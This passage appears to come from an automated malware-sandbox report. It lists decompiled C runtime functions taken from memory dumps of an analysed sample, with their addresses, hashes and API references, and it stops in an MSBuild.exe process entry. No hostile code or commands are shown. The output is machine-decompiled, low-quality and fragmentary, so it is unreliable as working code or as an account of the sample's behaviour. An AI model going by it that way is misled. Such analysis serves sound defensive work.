0x00c53076
0x00c53079
0x00c5307b
0x00c53080
0x00c53080
0x00c53085
0x00000000
0x00c53085
0x00c5304c
0x00c53051
0x00c53055
0x00c53055
0x00000000

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00C53065
__isleadbyte_l.LIBCMT ref: 00C53093
MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 00C530C1
MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 00C530F7

Memory Dump Source

Source File: 00000000.00000002.209147890.0000000000C41000.00000020.00020000.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.209140665.0000000000C40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209170066.0000000000C58000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209181620.0000000000C5F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209186235.0000000000C60000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209265852.0000000000CC9000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 9416b6a188bdf88a17bb65940c666e592fe06b4d735c5d09f9774c60e932ff15
Instruction ID: 031e3b3089d8feff5844cbed51af4c4d99e5edf278ecdafc09e96b0197cb8b8c
Opcode Fuzzy Hash: 9416b6a188bdf88a17bb65940c666e592fe06b4d735c5d09f9774c60e932ff15
Instruction Fuzzy Hash: 4531E338600786AFDB218F35C845BAE7BA5BF80392F154428EC21970D0E731DB88E794

Uniqueness

Uniqueness Score: -1.00%

Function 00C46F2D, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 24%

			E00C46F2D(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __ebp;
				void* _t25;
				void* _t28;
				void* _t29;
				intOrPtr _t30;
				void* _t31;
				intOrPtr* _t32;
				void* _t34;

				_t31 = __esi;
				_t29 = __edx;
				_t27 = __ebx;
				_t36 = _a28;
				_t30 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t30);
					_push(_a4);
					E00C47555(__ebx, _t30, __esi, _t36);
					_t34 = _t34 + 0x10;
				}
				_t37 = _a40;
				_push(_a4);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t30);
				}
				E00C459DE(_t28);
				_push(_t31);
				_t32 = _a32;
				_push( *_t32);
				_push(_a20);
				_push(_a16);
				_push(_t30);
				E00C477B6(_t27, _t29, _t30, _t32, _t37);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t32 + 4)) + 1;
				_push( *((intOrPtr*)(_a24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t30);
				_push(_a4);
				_t25 = E00C46D1F(_t27, _t29, _t30, _t32, _t37);
				if(_t25 != 0) {
					E00C459AE(_t25, _t30);
					return _t25;
				}
				return _t25;
			}

0x00c46f2d
0x00c46f2d
0x00c46f2d
0x00c46f30
0x00c46f35
0x00c46f38
0x00c46f3a
0x00c46f3d
0x00c46f40
0x00c46f41
0x00c46f44
0x00c46f49
0x00c46f49
0x00c46f4c
0x00c46f50
0x00c46f53
0x00c46f58
0x00c46f55
0x00c46f55
0x00c46f55
0x00c46f5b
0x00c46f60
0x00c46f61
0x00c46f64
0x00c46f66
0x00c46f69
0x00c46f6c
0x00c46f6d
0x00c46f75
0x00c46f7a
0x00c46f7e
0x00c46f84
0x00c46f87
0x00c46f8a
0x00c46f8d
0x00c46f8e
0x00c46f91
0x00c46f9c
0x00c46fa0
0x00000000
0x00c46fa0
0x00c46fa7

APIs

___BuildCatchObject.LIBCMT ref: 00C46F44

Part of subcall function 00C47555: ___AdjustPointer.LIBCMT ref: 00C4759E

_UnwindNestedFrames.LIBCMT ref: 00C46F5B
___FrameUnwindToState.LIBCMT ref: 00C46F6D
CallCatchBlock.LIBCMT ref: 00C46F91

Memory Dump Source

Source File: 00000000.00000002.209147890.0000000000C41000.00000020.00020000.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.209140665.0000000000C40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209170066.0000000000C58000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209181620.0000000000C5F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209186235.0000000000C60000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209265852.0000000000CC9000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID:
API String ID: 2633735394-0
Opcode ID: c150b4d4ee6c520d1deb80d80a3620b3d7d596ab6814b6957290872c38c5402e
Instruction ID: a1776c4e8eebcd2ce9254972a82391d939ec67995f6e584e95689ff1da4cfafa
Opcode Fuzzy Hash: c150b4d4ee6c520d1deb80d80a3620b3d7d596ab6814b6957290872c38c5402e
Instruction Fuzzy Hash: E9014832000109FBDF12AF95DC01EDA3FBAFF99764F154114FA5866121D332E965EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C4F732, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C4F732(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t28 = __edx;
				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00C4FC7F(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00C4F7B8(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E00C4FEF4(__edx, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00C4FE35(__edx, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x00c4f732
0x00c4f735
0x00c4f73b
0x00c4f7ae
0x00000000
0x00c4f742
0x00c4f742
0x00c4f745
0x00c4f760
0x00c4f763
0x00c4f783
0x00c4f795
0x00c4f765
0x00c4f765
0x00c4f768
0x00000000
0x00c4f76a
0x00c4f77c
0x00c4f77c
0x00c4f768
0x00c4f7b3
0x00c4f7b7
0x00c4f747
0x00c4f75f
0x00c4f75f
0x00c4f745

APIs

__cftof_l.LIBCMT ref: 00C4F756

Part of subcall function 00C4FE35: __fltout2.LIBCMT ref: 00C4FE5E

__cftog_l.LIBCMT ref: 00C4F77C
__cftoe_l.LIBCMT ref: 00C4F7AE

Memory Dump Source

Source File: 00000000.00000002.209147890.0000000000C41000.00000020.00020000.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.209140665.0000000000C40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209170066.0000000000C58000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209181620.0000000000C5F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209186235.0000000000C60000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209265852.0000000000CC9000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction ID: 34d7d5ea2cf74b3a24911d2f1bf28ed3dcfb38a29164c01314dd9a2b7b1b8815
Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction Fuzzy Hash: 38011E7240014EBBCF525E84DD51CEE3F66BB19354F588529FE2899131D33ACAB2BB81

Uniqueness

Uniqueness Score: -1.00%

Function 00C4C33C, Relevance: 6.0, APIs: 4, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00C4C33C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				LONG* _t20;
				signed int _t25;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t24 = __ebx;
				_push(0xc);
				_push(0xc5d4e0);
				E00C4AF50(__ebx, __edi, __esi);
				_t31 = E00C4AA60(__edx, __edi, _t35);
				_t25 =  *0xc5fd54; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t25) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E00C46AD0(0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0xc5fda4; // 0xf84328
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0xc600a0;
								if(__eflags != 0) {
									E00C44444(_t33);
								}
							}
						}
						_t20 =  *0xc5fda4; // 0xf84328
						 *(_t31 + 0x68) = _t20;
						_t33 =  *0xc5fda4; // 0xf84328
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00C4C3D8();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					E00C4AC6E(_t24, _t29, _t31, _t33, _t38, 0x20);
				}
				return E00C4AF95(_t33);
			}

0x00c4c33c
0x00c4c33c
0x00c4c33c
0x00c4c33c
0x00c4c33e
0x00c4c343
0x00c4c34d
0x00c4c34f
0x00c4c358
0x00c4c379
0x00c4c37f
0x00c4c383
0x00c4c386
0x00c4c389
0x00c4c38f
0x00c4c391
0x00c4c393
0x00c4c39c
0x00c4c39e
0x00c4c3a0
0x00c4c3a6
0x00c4c3a9
0x00c4c3ae
0x00c4c3a6
0x00c4c39e
0x00c4c3af
0x00c4c3b4
0x00c4c3b7
0x00c4c3bd
0x00c4c3c1
0x00c4c3c1
0x00c4c3c7
0x00c4c3ce
0x00c4c360
0x00c4c360
0x00c4c360
0x00c4c363
0x00c4c365
0x00c4c369
0x00c4c36e
0x00c4c376

APIs

Part of subcall function 00C4AA60: __getptd_noexit.LIBCMT ref: 00C4AA61

__lock.LIBCMT ref: 00C4C379
InterlockedDecrement.KERNEL32(?), ref: 00C4C396
_free.LIBCMT ref: 00C4C3A9
InterlockedIncrement.KERNEL32(00F84328), ref: 00C4C3C1

Memory Dump Source

Source File: 00000000.00000002.209147890.0000000000C41000.00000020.00020000.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.209140665.0000000000C40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209170066.0000000000C58000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209181620.0000000000C5F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209186235.0000000000C60000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209265852.0000000000CC9000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
String ID:
API String ID: 2704283638-0
Opcode ID: fbad010de48963ee555cedc1a9157d1b57706e905b8c7383f085d75f4ebbb48b
Instruction ID: a32a800efa9a94834fe19cd0e5f932045f63b9dbecb108b159d60ff599db0b7d
Opcode Fuzzy Hash: fbad010de48963ee555cedc1a9157d1b57706e905b8c7383f085d75f4ebbb48b
Instruction Fuzzy Hash: AF01D6369427119FD765AF54D4857AE7760BF05B21F008019F810772B1CB346A85EBC6

Uniqueness

Uniqueness Score: -1.00%

Function 00C41CE0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00C41CE0(intOrPtr* __ecx, unsigned int _a4, intOrPtr* _a8, void _a12) {
				intOrPtr _v0;
				intOrPtr _v4;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v33;
				intOrPtr* _v40;
				intOrPtr* _v44;
				signed int _v60;
				intOrPtr _v84;
				intOrPtr* _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t79;
				intOrPtr* _t84;
				intOrPtr* _t92;
				intOrPtr _t94;
				intOrPtr* _t100;
				intOrPtr _t103;
				char* _t112;
				intOrPtr _t115;
				intOrPtr _t125;
				unsigned int _t129;
				intOrPtr _t130;
				void* _t132;
				intOrPtr* _t141;
				intOrPtr* _t142;
				unsigned int _t144;
				intOrPtr* _t147;
				intOrPtr* _t148;
				intOrPtr _t156;
				intOrPtr* _t157;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t163;
				signed int _t165;
				intOrPtr _t168;
				intOrPtr* _t185;
				intOrPtr* _t186;
				intOrPtr* _t187;
				intOrPtr _t204;
				intOrPtr _t205;
				intOrPtr _t207;
				intOrPtr _t208;

				_t129 = _a4;
				_t161 =  *((intOrPtr*)(_t129 + 0x10));
				_t184 = __ecx;
				_t141 = _a8;
				if(_t161 < _t141) {
					E00C437C5(__eflags, "invalid string position");
					goto L25;
				} else {
					_t161 =  <  ? _a12 : _t161 - _t141;
					if(__ecx != _t129) {
						__eflags = _t161 - 0xfffffffe;
						if(__eflags > 0) {
							goto L26;
						} else {
							_t115 =  *((intOrPtr*)(__ecx + 0x14));
							__eflags = _t115 - _t161;
							if(_t115 >= _t161) {
								__eflags = _t161;
								if(_t161 != 0) {
									goto L9;
								} else {
									 *((intOrPtr*)(__ecx + 0x10)) = _t161;
									__eflags = _t115 - 0x10;
									if(_t115 < 0x10) {
										 *((char*)(__ecx)) = 0;
										return __ecx;
									} else {
										 *((char*)( *__ecx)) = 0;
										return __ecx;
									}
								}
							} else {
								_push( *((intOrPtr*)(__ecx + 0x10)));
								_push(_t161);
								L65();
								_t141 = _a8;
								__eflags = _t161;
								if(_t161 == 0) {
									L23:
									return _t184;
								} else {
									L9:
									__eflags =  *((intOrPtr*)(_t129 + 0x14)) - 0x10;
									if( *((intOrPtr*)(_t129 + 0x14)) >= 0x10) {
										_t129 =  *_t129;
									}
									__eflags =  *((intOrPtr*)(_t184 + 0x14)) - 0x10;
									if( *((intOrPtr*)(_t184 + 0x14)) < 0x10) {
										_t157 = _t184;
									} else {
										_t157 =  *_t184;
									}
									__eflags = _t161;
									if(_t161 != 0) {
										E00C44F20(_t157, _t129 + _t141, _t161);
									}
									__eflags =  *((intOrPtr*)(_t184 + 0x14)) - 0x10;
									 *((intOrPtr*)(_t184 + 0x10)) = _t161;
									if( *((intOrPtr*)(_t184 + 0x14)) < 0x10) {
										 *((char*)(_t184 + _t161)) = 0;
										goto L23;
									} else {
										 *((char*)( *_t184 + _t161)) = 0;
										return _t184;
									}
								}
							}
						}
					} else {
						_t125 = _t161 + _t141;
						if( *((intOrPtr*)(__ecx + 0x10)) < _t125) {
							L25:
							E00C437C5(__eflags, "invalid string position");
							L26:
							_push("string too long");
							E00C43797(__eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_t204 = _t207;
							_push(_t184);
							_push(_t161);
							_t162 = _v24;
							_t185 = _t141;
							__eflags = _t162 - 0xffffffff;
							if(__eflags == 0) {
								_push("string too long");
								E00C43797(__eflags);
								goto L48;
							} else {
								__eflags = _t162 - 0xfffffffe;
								if(__eflags > 0) {
									L48:
									_push("string too long");
									E00C43797(__eflags);
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									_push(_t204);
									_t205 = _t207;
									_push(_t185);
									_t186 = _t141;
									_t142 = _v44;
									_push(_t162);
									_t163 =  *((intOrPtr*)(_t186 + 0x10));
									__eflags = _t163 - _t142;
									if(__eflags < 0) {
										E00C437C5(__eflags, "invalid string position");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t205);
										_push(0xffffffff);
										_push(E00C56F10);
										_push( *[fs:0x0]);
										 *[fs:0x0] = _t207;
										_t208 = _t207 - 0x14;
										_push(_t129);
										_push(_t186);
										_push(_t163);
										_v84 = _t208;
										_t187 = _t142;
										_v96 = _t187;
										_t79 = _v60;
										_t165 = _t79 | 0x0000000f;
										__eflags = _t165 - 0xfffffffe;
										if(_t165 <= 0xfffffffe) {
											_t129 =  *(_t187 + 0x14);
											_t144 = _t129 >> 1;
											__eflags = _t144 - 0xaaaaaaab * _t165 >> 0x20 >> 1;
											if(_t144 > 0xaaaaaaab * _t165 >> 0x20 >> 1) {
												__eflags = _t129 - 0xfffffffe - _t144;
												_t165 = _t144 + _t129;
												if(_t129 > 0xfffffffe - _t144) {
													_t165 = 0xfffffffe;
												}
											}
										} else {
											_t165 = _t79;
										}
										_v20 = 0;
										_t60 = _t165 + 1; // 0xffffffff
										_v40 = E00C420C0(_t129, _t165, _t187, _t60);
										_v20 = 0xffffffff;
										_t130 = _v4;
										__eflags = _t130;
										if(_t130 != 0) {
											__eflags =  *(_t187 + 0x14) - 0x10;
											if( *(_t187 + 0x14) < 0x10) {
												_t147 = _t187;
											} else {
												_t147 =  *_t187;
											}
											__eflags = _t130;
											if(_t130 != 0) {
												E00C44F20(_t83, _t147, _t130);
												_t208 = _t208 + 0xc;
											}
										}
										__eflags =  *(_t187 + 0x14) - 0x10;
										if( *(_t187 + 0x14) >= 0x10) {
											L00C445E5( *_t187);
										}
										 *_t187 = 0;
										_t84 = _v40;
										 *_t187 = _t84;
										 *(_t187 + 0x14) = _t165;
										 *((intOrPtr*)(_t187 + 0x10)) = _t130;
										__eflags = _t165 - 0x10;
										if(_t165 >= 0x10) {
											_t187 = _t84;
										}
										 *((char*)(_t187 + _t130)) = 0;
										 *[fs:0x0] = _v28;
										return _t84;
									} else {
										_t156 = _v0;
										__eflags = _t163 - _t142 - _t156;
										if(_t163 - _t142 > _t156) {
											__eflags = _t156;
											if(_t156 == 0) {
												L63:
												return _t186;
											} else {
												__eflags =  *((intOrPtr*)(_t186 + 0x14)) - 0x10;
												if( *((intOrPtr*)(_t186 + 0x14)) < 0x10) {
													_t92 = _t186;
												} else {
													_t92 =  *_t186;
												}
												_t168 = _t163 - _t156;
												_push(_t129);
												_t132 = _t92 + _t142;
												_t94 = _t168 - _t142;
												__eflags = _t94;
												if(_t94 != 0) {
													E00C43E00(_t132, _t132 + _t156, _t94);
												}
												__eflags =  *((intOrPtr*)(_t186 + 0x14)) - 0x10;
												 *((intOrPtr*)(_t186 + 0x10)) = _t168;
												if( *((intOrPtr*)(_t186 + 0x14)) < 0x10) {
													 *((char*)(_t186 + _t168)) = 0;
													goto L63;
												} else {
													 *((char*)( *_t186 + _t168)) = 0;
													return _t186;
												}
											}
										} else {
											__eflags =  *((intOrPtr*)(_t186 + 0x14)) - 0x10;
											 *((intOrPtr*)(_t186 + 0x10)) = _t142;
											if( *((intOrPtr*)(_t186 + 0x14)) < 0x10) {
												_t100 = _t186;
												 *((char*)(_t100 + _t142)) = 0;
												return _t100;
											} else {
												 *((char*)( *_t186 + _t142)) = 0;
												return _t186;
											}
										}
									}
								} else {
									_t103 =  *((intOrPtr*)(_t185 + 0x14));
									__eflags = _t103 - _t162;
									if(_t103 >= _t162) {
										__eflags = _t162;
										if(_t162 != 0) {
											goto L31;
										} else {
											 *((intOrPtr*)(_t185 + 0x10)) = _t162;
											__eflags = _t103 - 0x10;
											if(_t103 < 0x10) {
												_t112 = _t185;
												 *_t112 = 0;
												return _t112;
											} else {
												 *((char*)( *_t185)) = 0;
												return _t185;
											}
										}
									} else {
										_push( *((intOrPtr*)(_t185 + 0x10)));
										_push(_t162);
										L65();
										__eflags = _t162;
										if(_t162 == 0) {
											L46:
											return _t185;
										} else {
											L31:
											__eflags = _t162 - 1;
											if(_t162 != 1) {
												__eflags =  *((intOrPtr*)(_t185 + 0x14)) - 0x10;
												if( *((intOrPtr*)(_t185 + 0x14)) < 0x10) {
													_t148 = _t185;
												} else {
													_t148 =  *_t185;
												}
												E00C46A40(_t148, _a4, _t162);
											} else {
												__eflags =  *((intOrPtr*)(_t185 + 0x14)) - 0x10;
												if( *((intOrPtr*)(_t185 + 0x14)) < 0x10) {
													 *_t185 = _a4;
												} else {
													 *((char*)( *_t185)) = _a4;
												}
											}
											__eflags =  *((intOrPtr*)(_t185 + 0x14)) - 0x10;
											 *((intOrPtr*)(_t185 + 0x10)) = _t162;
											if( *((intOrPtr*)(_t185 + 0x14)) < 0x10) {
												 *((char*)(_t185 + _t162)) = 0;
												goto L46;
											} else {
												 *((char*)( *_t185 + _t162)) = 0;
												return _t185;
											}
										}
									}
								}
							}
						} else {
							 *((intOrPtr*)(__ecx + 0x10)) = _t125;
							if( *((intOrPtr*)(__ecx + 0x14)) < 0x10) {
								_push(_t141);
								_push(0);
								 *((char*)(_t125 + __ecx)) = 0;
								L49();
								return __ecx;
							} else {
								_push(_t141);
								_push(0);
								 *((char*)(_t125 +  *__ecx)) = 0;
								L49();
								return __ecx;
							}
						}
					}
				}
			}

0x00c41ce4
0x00c41ce9
0x00c41cec
0x00c41cee
0x00c41cf3
0x00c41de7
0x00000000
0x00c41cf9
0x00c41cfe
0x00c41d04
0x00c41d4d
0x00c41d50
0x00000000
0x00c41d56
0x00c41d56
0x00c41d59
0x00c41d5b
0x00c41d81
0x00c41d83
0x00000000
0x00c41d85
0x00c41d85
0x00c41d88
0x00c41d8b
0x00c41d9f
0x00c41da4
0x00c41d8d
0x00c41d90
0x00c41d98
0x00c41d98
0x00c41d8b
0x00c41d5d
0x00c41d5d
0x00c41d62
0x00c41d63
0x00c41d68
0x00c41d6b
0x00c41d6d
0x00c41dd9
0x00c41ddf
0x00c41d6f
0x00c41d6f
0x00c41d6f
0x00c41d73
0x00c41d75
0x00c41d75
0x00c41d77
0x00c41d7b
0x00c41da7
0x00c41d7d
0x00c41d7d
0x00c41d7d
0x00c41da9
0x00c41dab
0x00c41db3
0x00c41db8
0x00c41dbb
0x00c41dbf
0x00c41dc2
0x00c41dd5
0x00000000
0x00c41dc4
0x00c41dc6
0x00c41dd0
0x00c41dd0
0x00c41dc2
0x00c41d6d
0x00c41d5b
0x00c41d06
0x00c41d06
0x00c41d0c
0x00c41dec
0x00c41df1
0x00c41df6
0x00c41df6
0x00c41dfb
0x00c41e00
0x00c41e01
0x00c41e02
0x00c41e03
0x00c41e04
0x00c41e05
0x00c41e06
0x00c41e07
0x00c41e08
0x00c41e09
0x00c41e0a
0x00c41e0b
0x00c41e0c
0x00c41e0d
0x00c41e0e
0x00c41e0f
0x00c41e11
0x00c41e13
0x00c41e14
0x00c41e15
0x00c41e18
0x00c41e1a
0x00c41e1d
0x00c41ec1
0x00c41ec6
0x00000000
0x00c41e23
0x00c41e23
0x00c41e26
0x00c41ecb
0x00c41ecb
0x00c41ed0
0x00c41ed5
0x00c41ed6
0x00c41ed7
0x00c41ed8
0x00c41ed9
0x00c41eda
0x00c41edb
0x00c41edc
0x00c41edd
0x00c41ede
0x00c41edf
0x00c41ee0
0x00c41ee1
0x00c41ee3
0x00c41ee4
0x00c41ee6
0x00c41ee9
0x00c41eea
0x00c41eed
0x00c41eef
0x00c41f74
0x00c41f79
0x00c41f7a
0x00c41f7b
0x00c41f7c
0x00c41f7d
0x00c41f7e
0x00c41f7f
0x00c41f80
0x00c41f83
0x00c41f85
0x00c41f90
0x00c41f91
0x00c41f98
0x00c41f9b
0x00c41f9c
0x00c41f9d
0x00c41f9e
0x00c41fa1
0x00c41fa3
0x00c41fa6
0x00c41fab
0x00c41fae
0x00c41fb1
0x00c41fb7
0x00c41fbc
0x00c41fc7
0x00c41fc9
0x00c41fd2
0x00c41fd4
0x00c41fd7
0x00c41fd9
0x00c41fd9
0x00c41fd7
0x00c41fb3
0x00c41fb3
0x00c41fb3
0x00c41fde
0x00c41fe5
0x00c41ff1
0x00c41ff4
0x00c42034
0x00c42037
0x00c42039
0x00c4203b
0x00c4203f
0x00c42045
0x00c42041
0x00c42041
0x00c42041
0x00c42047
0x00c42049
0x00c4204e
0x00c42053
0x00c42053
0x00c42049
0x00c42056
0x00c4205a
0x00c4205e
0x00c42063
0x00c42066
0x00c42069
0x00c4206c
0x00c4206e
0x00c42071
0x00c42074
0x00c42077
0x00c42079
0x00c42079
0x00c4207b
0x00c42082
0x00c4208f
0x00c41ef1
0x00c41ef1
0x00c41ef8
0x00c41efa
0x00c41f1f
0x00c41f21
0x00c41f67
0x00c41f6c
0x00c41f23
0x00c41f23
0x00c41f27
0x00c41f2d
0x00c41f29
0x00c41f29
0x00c41f29
0x00c41f2f
0x00c41f31
0x00c41f32
0x00c41f37
0x00c41f37
0x00c41f39
0x00c41f41
0x00c41f46
0x00c41f49
0x00c41f4d
0x00c41f51
0x00c41f63
0x00000000
0x00c41f53
0x00c41f55
0x00c41f5e
0x00c41f5e
0x00c41f51
0x00c41efc
0x00c41efc
0x00c41f00
0x00c41f03
0x00c41f13
0x00c41f16
0x00c41f1c
0x00c41f05
0x00c41f08
0x00c41f10
0x00c41f10
0x00c41f03
0x00c41efa
0x00c41e2c
0x00c41e2c
0x00c41e2f
0x00c41e31
0x00c41e54
0x00c41e56
0x00000000
0x00c41e58
0x00c41e58
0x00c41e5b
0x00c41e5e
0x00c41e6d
0x00c41e70
0x00c41e75
0x00c41e60
0x00c41e63
0x00c41e6a
0x00c41e6a
0x00c41e5e
0x00c41e33
0x00c41e33
0x00c41e36
0x00c41e37
0x00c41e3c
0x00c41e3e
0x00c41eb9
0x00c41ebe
0x00c41e40
0x00c41e40
0x00c41e40
0x00c41e43
0x00c41e81
0x00c41e85
0x00c41e8b
0x00c41e87
0x00c41e87
0x00c41e87
0x00c41e94
0x00c41e45
0x00c41e45
0x00c41e49
0x00c41e7d
0x00c41e4b
0x00c41e50
0x00c41e50
0x00c41e49
0x00c41e9c
0x00c41ea0
0x00c41ea3
0x00c41eb5
0x00000000
0x00c41ea5
0x00c41ea7
0x00c41eb0
0x00c41eb0
0x00c41ea3
0x00c41e3e
0x00c41e31
0x00c41e26
0x00c41d12
0x00c41d16
0x00c41d19
0x00c41d34
0x00c41d37
0x00c41d3b
0x00c41d3f
0x00c41d4a
0x00c41d1b
0x00c41d1d
0x00c41d1e
0x00c41d22
0x00c41d26
0x00c41d31
0x00c41d31
0x00c41d19
0x00c41d0c
0x00c41d04

APIs

_memmove.LIBCMT ref: 00C41DB3

Strings

string too long, xrefs: 00C41DF6
invalid string position, xrefs: 00C41DE2, 00C41DEC

Memory Dump Source

Source File: 00000000.00000002.209147890.0000000000C41000.00000020.00020000.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.209140665.0000000000C40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209170066.0000000000C58000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209181620.0000000000C5F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209186235.0000000000C60000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209265852.0000000000CC9000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: bf2aa05d35c394fd9e78f1d37e3948ad13a4ced31fbb7ea3eb9fef92e48a1a4b
Instruction ID: 519e1e63e0809f2148353c19991a2f580a9e1a15a52aa87315b52c765c7eae4a
Opcode Fuzzy Hash: bf2aa05d35c394fd9e78f1d37e3948ad13a4ced31fbb7ea3eb9fef92e48a1a4b
Instruction Fuzzy Hash: B93118727003509BD7329E9CE880B5BF7AAFB90B61F140A2FEC9187241C7B19981C7A1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: MSBuild.exe PID: 6744 Parent PID: 6672 MSBuild.exeCOMMON

Executed Functions

Function 04FA3588, Relevance: 8.4, APIs: 1, Strings: 3, Instructions: 1385COMMON

Download Yara Rule

Strings

:@Dr, xrefs: 04FA6E51
:@Dr, xrefs: 04FA69BB
:@Dr, xrefs: 04FA6532

Memory Dump Source

Source File: 00000003.00000002.475672419.0000000004F90000.00000040.00000001.sdmp, Offset: 04F90000, based on PE: false

Similarity

API ID:
String ID: :@Dr$:@Dr$:@Dr
API String ID: 0-1395999109
Opcode ID: b1438e68335ccbe6c20cf2f32d5471873b0f4f240879d105ed64b9f082f01d04
Instruction ID: 0c67e7a2b98ac8a88dd77d95791692bee50a76d0bddf6a4e4d8ec904d7190fc7
Opcode Fuzzy Hash: b1438e68335ccbe6c20cf2f32d5471873b0f4f240879d105ed64b9f082f01d04
